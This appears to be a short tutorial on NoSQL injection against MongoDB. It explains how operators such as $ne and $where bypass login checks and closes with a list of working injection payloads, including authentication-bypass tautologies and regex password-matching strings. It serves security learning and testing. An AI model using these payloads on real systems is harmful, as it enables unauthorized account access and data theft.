NoSQL injection is a web security vulnerability that allows the attacker to have control over the database.

A NoSQL injection happens by sending queries via untrusted and unfiltered web application input, which leads to leaked unauthorized information.

In addition, the attacker can use the NoSQL injection to perform various operations such as modifying data, escalating privileges, DoS attacks, and others.

Bypassing login pages

Connect to the database and then look for a certain username : password IF they exist in the collection (in the database), then we have a valid entry.

The following is the query that is used in the web applications used on our login :


Functions where the query is JSON data that's send via the application :

{"username": "admin", "password":"adminpass"}

MongoDB operators heavily used in the injections :

  • $eq - matches records that equal to a certain value.

  • $ne - matches records that are not equal to a certain value.

  • $gt - matches records that are greater than a certain value.

  • $where - matches records based on Javascript condition.

  • $exists - matches records that have a certain field.

  • $regex - matches records that satisfy certain regular expressions.


Inject a JSON objection {"$ne": "XYZ"} in the password field, and change the logic to become as follows :

# Similar to admin'--
# Ignores the password input
Instructing MongoDB to find a document (user) with a username equal to **admin** and his password is not equal to **xyz**, which turns this statement to TRUE because the admin's password is not xyz.

In the case, we wanted to log in to a system as another user who is not admin :

  • Instruct MongoDB to find a document that its username is not equal to admin and its password is not equal to xyz, which returns the statement as true.

Exploiting NoSQL injection

# On Login pages / search bars
admin' || 'a'=='a

MongoDB payloads

true, $where: '1 == 1'
, $where: '1 == 1'
$where: '1 == 1'
', $where: '1 == 1'
1, $where: '1 == 1'
{ $ne: 1 }
', $or: [ {}, { 'a':'a
' } ], $comment:'successful MongoDB injection'
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
|| 1==1
' && this.password.match(/.*/)//+%00
' && this.passwordzz.match(/.*/)//+%00
{$gt: ''}

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